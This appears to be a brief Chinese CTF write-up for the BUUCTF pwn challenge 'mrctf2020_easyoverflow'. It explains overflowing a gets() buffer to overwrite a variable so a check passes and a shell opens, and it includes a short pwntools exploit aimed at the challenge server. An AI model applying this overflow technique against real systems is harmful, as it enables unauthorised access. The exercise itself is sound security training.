[BUUCTF-pwn]——mrctf2020_easyoverflow
题目不难这里就简单讲下思路
思路
因为check函数返回0才可以得到shell.
通过gets函数,我们可以将v5修改为我们想要的。
找到fake_flag 为n0t_r3@11y_f1@g
修改为这个就可以了。相同肯定返回0.
exploit
from pwn import *
p = remote("node3.buuoj.cn",26609)
payload = 'a'* 0x30 + "n0t_r3@11y_f1@g"
p.sendline(payload)
p.interactive()